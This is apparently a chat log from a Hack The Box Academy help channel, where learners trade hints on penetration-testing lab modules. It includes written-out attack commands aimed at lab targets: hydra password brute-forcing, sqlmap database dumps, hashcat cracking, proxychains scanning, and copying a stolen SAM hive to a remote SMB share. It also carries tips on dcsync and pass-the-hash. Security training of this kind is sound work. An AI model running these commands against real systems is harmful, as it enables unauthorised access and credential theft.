-t 48 does well, took me around 20min to hit the pass
hydra -l sam -P mut_password.list ftp://10.129.206.74 -t 48
will it work?
okay let me try
I can only step 2 times...
and I should step until start+16...
but I dont have anything in the start+10... no hex value
there is, look at rax
that instruction is running an xor on the rax register. you need to look at the contents of the rax register itself
all i can really say is based on what you've learned in the module, you should choose options to get what you're looking for
Nw I got the answers! thank you tho
no worries! :))
@fathom pendant thank you so much
I got the pass
All I get from the info registers rax is "0x0"
well again you need to stop at the right instruction
read the question carefully and the "Step" paragraph
got it!!!!!
OMG...
thanks everyone!! I will have lots of struggles with this module hahahaha
just make sure to understand what's in the module
could someone please help with this question. Investigate all records for the domain "inlanefreight.com" with the help of dig or nslookup and submit the one unique record in double quotes as the answer.
the rest of the module is super easy
deleted
but i can't solve the first question, it's for DNS ENUMERATION WITH PYTHON
have you tried the dig ANY query?
yea i can do it again though 1 sec
or AXFR?
the module hasn't brought up axfr
this was my result with any a.root-servers.net. nstld.verisign-grs.com.****
you'd probably get better answers if you included what module you're working on
DNS ENUMERATION WITH PYTHON MODULE 27
its the 1st question in DNS Records and Queries
Investigate all records for the domain "inlanefreight.com" with the help of dig or nslookup and submit the one unique record in double quotes as the answer.
we don't know what you're having trouble with so it's hard to answer still
you just presented a question in the module... like ok.. do what the module says?
or is it something specific?
i've used pretty much every command and tried all the answers and all these commands:
A IP Version 4 Address records
AAAA IP Version 6 Address records
CNAME Canonical Name records
HINFO Host Information records
ISDN Integrated Services Digital Network records
MX Mail exchanger record
NS Name Server records
PTR Reverse-lookup Pointer records
SOA Start of Authority records
TXT
in the txt there's a HTB flag but it's for nothing in the module
Hello guys, i'm new to these things about hacking and coding, i want to learn... can someone help me? Sorry if i'm ruining the conversation
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
in all of the records you get, do you see a record that is unique
im gonna compile all the records i feel like might be the answer, put them in notepad and go from there
Try this Flag as answer
i've tried 5+ times
the flag idk why it's there but it's also one of the only things in quotes
Reload the Academy page in the browser and make sure that there are no spaces at the beginning or end
Did anyone try the skill assessment of advanced sql injections? I feel like there is some minor version change in the postgres somewhere that breaks it
No, it is not bugged. It is correct
well atleast i know that the flag is the answer and im putting in wrong i guess
try inputting it without quotes
Tysm
ty aswell
what is the difference between a subdomain and host?
because a subdomain can also be a host record
i got the answer as of now, it was the flag without the quotes
That's a great question. A subdomain and domain are both related, like app.example.com with example.com. app.example.com is a subdomain of the domain example.com. A host is the name of a specific computer or server on the network. For example, it reads like a subdomain sometimes, such as smtp.example.com. That could be an outgoing email server for the domain that reads just like a subdomain, but it's a host, a specific server
Put simply, a host is just a device within the network
yep, thx. I guess what i am saying is apart from the name of the subdomain, we don't have a way of telling whether we found a subdomain or a host without trying to enumerate the SOA or other records within the subdomain
so for example if i see smtp.domain.com A record it's likely a host
but if i see dev.domain.com A record could be a subdomain could be a single host within domain.com
may be theres a host www.dev.domain.com and they put in dev.domain.com as an a record too
like a lot of websites put domain.com and www.domain.com pointing to same IP address in DNS
Apache vhosts
?
What is the FQDN of the host where the last octet ends with "x.x.x.203"?
question in the DNS Enumeration section in Footprinting module
gonna try some different wordlists
but still against the subdomain i guess
subdomain of a subdomain
make sure you have the full list of subdomains from an axfr before attempting the dnsenum tool
hmmmm so i can use the dnsenum tool to enumerate hosts in a subdomain that i find
yep
but since i don't know which are actual subdomains that contain hosts i should just brute force everything that looks like a subdomain no?
Should I start with Introduction to Python 3 or Introduction to Bash Scripting?
hard to answer, without knowing your objectives
There's no right answer, my objective is to complete everything on hackthebox
going through all of level 1 rn
Yep
@trail flicker start with python3 then why not
Bet
i think i'm better off using a bash for loop to enumerate hosts with dig rather than dnsenum, cos i can't force dnsenum to do just A record lookups
I'll start the python 3 in a lil, gotta do a couple things. Thanks 🙂
I just went through that module. I tried both ways, the bash for loop and dnsenum. I got the answer with dnsenum, but the bash for loop did not work for me. Sometimes you have to use different tools on the same objective to get the result
thx
i just mention it because the bash loop seems to be more efficient than the dnsenum
because we just do a forward lookup each time
but dnsenum tries to do the zone transfer and all that stuff first
Except dnsenum does more than axfr, which is why it doesn't work
Dnsenum is the tool to use
The for loop can be helpful, but you can make a for loop with dnsenum to check each subdomain you found though
dnsenum in lowercase
On mobile, first word is capitalized
yh thanks, i was just checking i wasn't using the wrong tool 🙂
in attacking coldfusion i do get a shell, and when i type whoami or hostname and get a name and try to submit it, i get "false answer". Does anyone know how i can get the answer exactly? is it an error or what?
Maybe wrong wordlist, try a more fierce one with the right subdomain
marcie, how do you remember all those modules xD
do you carry your notes with you, even on mobile :D?
i forget what i have had for lunch sometimes xD
Probably has notes on phone
CPTS is the best course there is full stop
the pro lab dante is so so soso fun if youve taken good notes
nice mixture between whats known and a bit more thinking outside the box
absolutely fantastic. Just wanted to express this
Can someone please explain --no-cast to me for SQLMap?
sqlmap -u "http://94.237.53.3:40532/case7.php?id=1" --batch --dump --union-cols=5
did not work for case 7 in the questions
but
sqlmap -u "http://94.237.53.3:40532/case7.php?id=1" --batch --dump --union-cols=5 --no-cast
did work
I found this on some github page, but it still makes no sense. What does this have to do with the number of columns?!
I feel like this whole SQLMap module is just trial and error on what works with no rhyme or reason.
it instructs the tool not to use any casting function or equivalent mechanism when performing the injection test. the use of casting functions can alert IDS or trigger format-specific errors that can cause the payload delivery to fail.
I understand how the --union-cols=5 works though, because that was mentioned in the module
What do you mean by "casting function"?
casting refers to the use of sql functions to convert data from one type to another
Am I correct in saying the --no-cast switch should be in my bag of "try it if nothing else works"?
So, for example, HTTP encoding?!
for example, if the SQL injection point is in a numerical context, sqlmap might use casting to ensure that the injected SQL code remains valid and executable by the database server
Is there a good way to find out if it's needed, or just blind trial and error?
I don't quite understand. Does it keep it from being HTTP encoded or something?
no
What is it trying to accomplish at a database level?
Sorry, the module doesn't go into much detail
I went back through every section of the module and couldn't find it again. I think it may have been in one of the hints.
sql queries are structured to handle specific data types in different parts of the query, like numeric data is expected in some conditions while strings are expected in others. sqlmap automatically tries to detect and adapt to the data type requirements of the query. the no cast option stops sqlmap from trying to adapt the payloads to match the data type requirements of the sql injection points through casting functions.
sometimes the automatic casting that sqlmap performs may not work as intended because it misinterprets the data context or because the db handles type conversions in some unusual way
Okay, that makes sense. So in this case, the columns are kept as numeric. Why would the command without --no-cast not work though?! I would assume it tries numeric values first for the --union-cols= value first
Are you saying that it's taking the --union-cols=5 and using something non-numeric in place of the 5 without using the --no-cast switch?
Seems to me like an anomaly.
'why would the command without no cast not work' -- again because sqlmap can misinterpret the data and do things that mess up the query, or the db does something that messes up the query
So it's safe to say use --no-cast on anything where I'm specifying a specific value for a switch then. Makes sense.
yeah if you have precise knowledge of the data type of the column and are confident about your formatting then no cast can simplify it and avoid potential errors due to sqlmap misinterpreting the data
really comes down to experimentation and knowledge of the target
Cool, thank you for the explanation!
Yeah, I really wish this was covered more in this section, or at least somewhere in the module.
Attacking Common Services, Hard
i have problems forming a working query, what am i doing wrong?
i have impersonated j... in sqlcmd and found the local linked server, now trying to execute commands with the sysadmin privs but i dont get a feedback from my query
im using double single quotes
looks right to me, dm me and i'll take a look
The pathetic thing is he’s typing it himself, it’s not even a bot
What an idiot you are
ban this psycho
maybe don't say it.
A ban with id: 2499 already exists for member acvoaasr1#0
Neato
thank you
It seems we had every variation of it
but not the actual word 😂
Sorry for that mess
just some child trying to be edgy on the internet, not your fault
Fk i missed it
be glad you did
what happened xD?
as i can remember there are 2 modules that are no longer in the repository when trying to install with pip or apt, it's been a minute
For anyone else who has any issues connecting to the target via RDP in the Windows Privilege Escalation - Windows Server module: I think this is an issue with the fact that it is a 2k8 box and doesn't like how xfreerdp is interacting with it. I have found there are no issues if you instead use rdesktop (sudo apt install rdesktop), which was built with and used with legacy systems
yo what is the best attack plan tactic, is there a website where u can see ?
we don't offer any hacking services
you want to get hacked?
im joking
can someone help? i used ssh dynamic port forwarding and then proxychains nmap, and then it says all the hosts are up for my nmap scan, but that's a lie?
no one here is going to give you any hacks
Completed Parallel DNS resolution of 3 hosts. at 16:19, 0.01s elapsed
Nmap scan report for 172.16.0.0
Host is up (0.078s latency).
Nmap scan report for 172.16.0.1
Host is up (3.1s latency).
Nmap scan report for 172.16.0.2
Host is up (3.1s latency).
why does nmap say all the hosts are up
proxychains nmap -v -sn 172.16.0.0-2 00
i used dynamic port forwarding with ssh
Last login: Wed Feb 21 08:13:15 2024
webadmin@inlanefreight:~$ channel 3: open failed: connect failed: No route to host
channel 3: open failed: connect failed: No route to host
channel 3: open failed: connect failed: No route to host
channel 3: open failed: connect failed: No route to host
Hello, is someone here with ysoserial experience? i've been trying to work on something but for some reason ysoserial won't accept the command and gives an error about command usage
network inet 172.16.5.15 netmask 255.255.0.0, network ip should be 172.16.0.0 ? that's what i scanned
ok sorry
why doesn't nmap work? it says all hosts up for the full network scan
i used dynamic port forwarding ssh 9080, then edited proxychains socks4 9080, then proxychains nmap with that cmd, and then it scans all and says all online
Those are weird flags for nmapping something when combined with port forwarding
why thats what module is
Maybe reset the module and try out the commands again to verify you didn't miss something
i c ok danke
Now I'm trying to solve the hard lab on the password attacks module. I got the password for 'johanna', logged in using evil-winrm, transferred the file L****.kdbx onto my machine, cracked it and got the password. I tried to use this password for user 'david' but it doesn't work, it tells me it's a wrong password, what should I do next ?
any help please ?
I'm stuck here, I got the password for user david , when I'm trying to use these creds with smbclient I got, authentication failure
I created a topic in this link, any help would be appreciated
https://forum.hackthebox.com/t/password-attacks-hard-lab/311608
Pivoting, Tunneling, and Port Forwarding
Page 16
Skills Assessment
the last device on pivoting wont ever start why
the .25
i reset that thang like 50 times
bruh wtf why wont it work
i rdped into the .35 using that username and pw then i do ping sweep and just no new ips
the DC ip wont load
i get .35 .15 but not .25 why wont this server load
Check the interfaces on .35, make sure the other octets are correct for .25
any help with this please ?
o danke
Password Attacks Lab - Hard
I got the password for user Johanna → 1*******!
I logged in using evil-winrm, then download the file L****.kdbx into my pwnbox
I cracked this file and got a password → Q*******
When I’m trying to use this password with user david in smbclient it gives me authentication failure
I’m stuck here what should I do next ?
Dm the password you have and the command you're using
Sometimes you just need to slow down and wait a bit 😉
Iirc 15 or 20 is the magic number when you do find it
there's two NICs but the same network ip, do i have to change anything for my ping sweep cmd? for /L %i in (1 1 254) do ping 172.16.10.%i -n 5 -w 100 | find "Reply" ?
Are they the same?
same network ip and subnet mask yes
different NIC ips tho
one was like 6.25 otherone was like 10.6 but its within the network 10.16.0.0
i don't need to change anything with the ping sweep, right, since it will just use its routing table
because that's not D* pw
that PW is for the PW manager
that wasn't an invitation to DM me @west ledge
you can log into rdp with J*
from there it should become clearer
Hey, y'all I got a question.
Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01.
I am currently on MS01, I did the dcsync of the t**ty user and got hashes, when I performed pth though, I am still on MS01 - meaning I did the dcsync wrong in some way as I didn't obtain admin hash for DC01.
Is there a parameter that I forgot to add?
Where he is correct according to my notes
Unless my notes are wrong
unless his explanation skipped signing into the PW DB
(which is what you cracked for)
you cracked the master pw db password
pth with mimikatz doesn't get you a remote shell, it just opens a terminal with the user you pth with on the same host
I tried this and I get stuck, what should I do with the password after cracking the Logins.kdbx file
Do I have to do tunneling and pivoting...X-X
brother, what 2john did you use to convert it. that would be your answer
if it's just a flag you can access it over smb from ms01, but it's always better to pivot
there's a password database/manager
I used keepass2john
Omg, I overlooked a step, Marcie is correct
so there's your password manager (without the 2john) on the machine
it's just the flag on the desktop..so uh...you are telling me I can somehow use smb to access the desktop.
I doubt it's in a share, but I will try.
Ok thanks, I will try this one now
Which area can you ask general HTB academy questions - not specific to a module but pertaining to VPN and accessing the academy from the same machine.
with admin you can access the entire file system as long as smb is open
\\DC01\C$
you can still ask here, if it's academy related you can ask here
Ok I'm asking - I seem to lose access to the academy website content when I start the vpn - I'm guessing its not intended to be use that way? I'd like to cut down the amount of machines I'm cutting and pasting between.
I'd recommend practicing your pivoting tho, you'll need it for the next SA anyways
it's not intended; it's a common Kali issue though
something like this maybe
I'm using parrot on a VM locally. Is there a way of modifying the VPN that people use?
nope
it's just your network settings for w/e reason making the tun0 the default connection even though it shouldn't
yeah, I will.
the vpn pack is a split-tunnel meaning it shouldn't affect your network traffic
I have to re-view how to pivot without SSH.
Thank you I'll look into
the article i linked should resolve the issue
It works nicely - not an exact article but close enough to get it to work. Thank you!
close enough to lead you to what you need 👍
I'm at the point where I have the user tom on htb academy's footprinting hard lab
and I have the username and password I am supposed to log in as:
┌─[us-academy-2]─[10.10.14.139]─[htb-ac-605555@htb-4d1e3vlqyg]─[~]
└──╼ [★]$ braa backup@10.129.47.90:.*
but its asking me for ser's password and the assignment doesn't say anything about ser
why is this? the username and password I get from the braa scan and 'ser' aren't compatible.
wdym 'ser' it sounds like you're trying to ssh/login incorrectly
Hey guys!
Currently working on “introduction to digital forensics - rapid triage examination and analysis tools”
Stuck for several days on first question. Can I have some help?
I solved problem nevermind
Zone.Identifier never changes
Can I dm you?
Okay, thank you anyway!
I'm working on the passwd, shadow, and opasswd section from the password attacks module...
I grabbed the hash from the account under Will's .backup directory, but hashcat isn't cracking it...
hashcat -a 0 -m 1800 hash.txt ~/Documents/Seclists/wordlists/rockyou.txt -o ~/Desktop/cracked.txt
don't paste the full thing
Any ideas as to what I'm doing wrong?
I figured maybe someone could double-check it for me. Sorry.
try using the mutated wordlist
With the hash...?
They used rockyou.txt in the example.
has anyone done the intro to whitebox pentesting?
in order of checks: it's passwd.list -> mutated_password.list -> rockyou
and that's just as an example
start with given resources
then branch out
Understood. Thanks.
also by "hashcat isn't cracking it" do you mean it consistently goes to Exhausted?
i would double check that no files got corrupted in transfer
md5sum file on both ends
also as a tip: save all passwords you find - they may prove useful later
Will do.
I take a lot of notes.
this module and ad enum & attacks reuses creds a fair bit
also if you wanna have a mostly easier time: once you get into a linux env check /home/ for users and in a windows env check C:\users (for local)
(windows has some other tools though for shaking out passwords)
Thanks for the advice.
Anyone who has cracked the Admin password for Password Attacks Lab - Hard module plz DM me. I'm unsure what to do at this stage since I'm getting multiple passwords from the mutated list
Anyone run into issues using crackmapexec for RDP? I've tried a couple cmds and it doesn't connect to the target host
Sure you're not skipping steps? You might want to backup and see what you can do offline. I would be puzzled if you obtained multiple passwords the intended way.
That wasn't an invite for dm, keep it here, i'm heading off to bed shortly
You don't need the admin pass for that file, there are tools similar to what you have already done
Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all data the account name with the highest amount of Kerberos authentication ticket requests. Enter it as your answer. Any hint for this?
module name: Understanding Log Sources & Investigating with Splunk
Introduction To Splunk & SPL
You need to use one of the requests on the lesson page
There are no tricks for this one
Don't include domain name before user name
thx
Use the user's credentials we found in the previous section and find out the credentials for MySQL. Submit the credentials as the answer. (Format: <username>:<password>)
https://academy.hackthebox.com/module/147/section/1328
I have ssh using sam's credential but what to do next? pls help
When you try to login into the login form of any website using any form of credentials and you are using Burp Suite to capture you login data, isn't it supposed to return POST data , not GET data?
Anyone free to lend a hand with mounting a VHD drive in pwnbox?
I've tried a few things and not getting anywhere
Any hint skill ass module injection attacks
the what injection?
skill assessment i guess
What the heck is the Password Attacks module.. I'm lucky I got a student subscription, if I paid a thousand bucks a year for Gold and get trolled with stuff like the question on Password Mutations I'd be furious
the question is fine. A lot of times you'll run into last-step questions ¯\_(ツ)_/¯
Always scan the target first
My brain is melting over here with this VHD file
Look up mount bitlocker in this channel
And you'll find a couple links to guides
I've read the same ones by the looks, and no bueno
I completely understand that people shouldn't be handheld, because you need to struggle to learn BUT asking misleading questions isn't the way^^ Imagine I spend 1-2 hours a day next to a full time job and I pay to be educated only to have my time wasted and not respected. Not saying that you should be able to go through the modules in a breeze..
Not misleading really, you do need to log into ssh to answer the question.
Always enumerate the host before attacking it
See what's open
Once you saw ssh was painfully slow: look for other services
It shows transfer knowledge, for sure. And the next page in the module could have given you the idea to do so. But in a well designed curriculum you should assume the reader's past knowledge on which he can build
These VHD guides are showing how to decrypt the file once it's already connected. For example, its mount point is /sda2 meaning it's connected already. In this case it's just a file on disk that hasn't been mounted or connected in any way. And when I try to mount it, I get errors.
Which previous knowledge can be inferred by what is considered the prerequisite modules
But wasted energy to write walls of text here^^ Have a nice day anyway
Yes it is lol at least the guide I used did. Just plug in pw where applicable and you're good
But that's what I'm trying to explain, if I cannot mount the VHD file I can't decrypt it
as much as the Password Attacks module was annoying, i don't think i ever found it misleading
So you don't have the pw?
I do
What mount guide are you using?
Accessing content from Windows BitLocker encrypted partition in a vhd file on Linux
Hello, can someone help me find a correct answer to the SQLMap Skill Assesment? I'm stuck here for couple of hours, didn't even begin to using sqlmap, I just can't find the correct vector.
I also read some user forum and I start to believe there is some unknown issue on my side
I transferred the vhdx file to my main pc and was able to mount it without any issues
didn't even bother trying in linux because it was so easy to do in windows
you probably don't even need to transfer it and could mount it on the victim system i'd imagine
I'm running pwnbox via browser, I'm guessing you did that through VM?
Mounting requires admin permissions
It sure does
yeah i have a VM
👍
It's doable in linux
I'm sure it is, at this point since it's been so time consuming i'm just trying to move forward with it
The article I linked is the most simple and straightforward way
And doesn't make any pre-made assumptions
Well nfi why it's not working
Try the steps in the article I linked, the article you linked also mentions using dislocker to unlock
they changed the streak point system? now on every question i have a "+10 Streak pts" next to it
Or just update questions to reflect
did they? worked for me yesterday
I don't think you're on the same page
We're saying questions now reflect giving streak points
the main platform says tomorrow the accounts combine
Curious how it’ll be done
Target ip down for anyone else?
why wrong?
show your command to start the smb server
Type the full path of the sam.save file
true
It doesn't find it since you aren't in the correct dir
ok
What module?
that's the footprinting module
have you tried using the list in the resources section?
Hopefully some evasion soon 😃
yup try that
I mean there's a reason why they release C# module xD
hello guys
why I am getting error here
what's this?
yes this
Apply the concepts taught in this section to obtain the password to the ITbackdoor user account on the target. Submit the clear-text password as the answer.
anybody can help?
try move C:\sam.save \\ip\share